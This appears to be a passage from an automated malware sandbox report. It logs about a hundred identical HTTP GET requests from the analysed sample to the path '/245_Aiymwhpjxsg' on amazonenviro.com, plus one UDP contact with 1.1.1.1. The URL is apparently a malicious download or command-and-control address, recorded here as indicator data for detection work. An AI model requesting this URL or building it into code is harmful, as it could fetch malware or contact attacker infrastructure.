            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
